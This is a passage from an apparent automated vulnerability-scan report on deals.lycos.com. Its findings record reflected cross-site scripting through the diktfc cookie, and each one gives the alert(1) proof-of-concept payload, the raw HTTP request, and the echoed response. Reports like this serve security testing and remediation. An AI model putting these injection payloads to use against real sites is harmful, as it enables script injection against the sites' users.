P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
"http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c8c0"><script>alert(1)</script>d9b09df56e0&amp;cj=1" alt="tracker" />
...[SNIP]...

1.220. http://deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/nokia-2720-prepaid-cell-phone-for-6-413497

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3b10"%3balert(1)//c0968ffef2c was submitted in the diktfc cookie. This input was echoed as b3b10";alert(1)//c0968ffef2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/nokia-2720-prepaid-cell-phone-for-6-413497 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3b10"%3balert(1)//c0968ffef2c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3b10";alert(1)//c0968ffef2c"
});
</script>
...[SNIP]...

1.221. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/panasonic-58-1080p-plasma-hdtv-1-100-414276

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4403f"><script>alert(1)</script>7f5d7171fd2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4403f"><script>alert(1)</script>7f5d7171fd2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4403f"><script>alert(1)</script>7f5d7171fd2&amp;cj=1" alt="tracker" />
...[SNIP]...

1.222. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/panasonic-58-1080p-plasma-hdtv-1-100-414276

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db343"%3balert(1)//3b16844b478 was submitted in the diktfc cookie. This input was echoed as db343";alert(1)//3b16844b478 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adb343"%3balert(1)//3b16844b478; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adb343";alert(1)//3b16844b478"
});
</script>
...[SNIP]...

1.223. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50667"><script>alert(1)</script>3e46c174419 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A50667"><script>alert(1)</script>3e46c174419; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
tp://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A50667"><script>alert(1)</script>3e46c174419&amp;cj=1" alt="tracker" />
...[SNIP]...

1.224. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4eee"%3balert(1)//c42f28c6d4b was submitted in the diktfc cookie. This input was echoed as f4eee";alert(1)//c42f28c6d4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af4eee"%3balert(1)//c42f28c6d4b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af4eee";alert(1)//c42f28c6d4b"
});
</script>
...[SNIP]...

1.225. http://deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/panasonic-dmc-zs6-12mp-camera-for-150-414700

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8948a"%3balert(1)//0c42ac67901 was submitted in the diktfc cookie. This input was echoed as 8948a";alert(1)//0c42ac67901 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8948a"%3balert(1)//0c42ac67901; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
cript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8948a";alert(1)//0c42ac67901"
});
</script>
...[SNIP]...

1.226. http://deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/panasonic-dmc-zs6-12mp-camera-for-150-414700

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d553c"><script>alert(1)</script>99f8fa73005 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad553c"><script>alert(1)</script>99f8fa73005; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ttp://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad553c"><script>alert(1)</script>99f8fa73005&amp;cj=1" alt="tracker" />
...[SNIP]...

1.227. http://deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d16e3"><script>alert(1)</script>e618ca21634 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad16e3"><script>alert(1)</script>e618ca21634; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
p://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad16e3"><script>alert(1)</script>e618ca21634&amp;cj=1" alt="tracker" />
...[SNIP]...

1.228. http://deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3da3d"%3balert(1)//178fd7981ee was submitted in the diktfc cookie. This input was echoed as 3da3d";alert(1)//178fd7981ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3da3d"%3balert(1)//178fd7981ee; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ipt">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3da3d";alert(1)//178fd7981ee"
});
</script>
...[SNIP]...

1.229. http://deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-32-720p-lcd-hdtv-for-330-414355

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dea67"><script>alert(1)</script>5b7fd28b581 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/samsung-32-720p-lcd-hdtv-for-330-414355 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adea67"><script>alert(1)</script>5b7fd28b581; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
rc="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adea67"><script>alert(1)</script>5b7fd28b581&amp;cj=1" alt="tracker" />
...[SNIP]...

1.230. http://deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-32-720p-lcd-hdtv-for-330-414355

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e5a9"%3balert(1)//21691b5acad was submitted in the diktfc cookie. This input was echoed as 6e5a9";alert(1)//21691b5acad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/samsung-32-720p-lcd-hdtv-for-330-414355 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
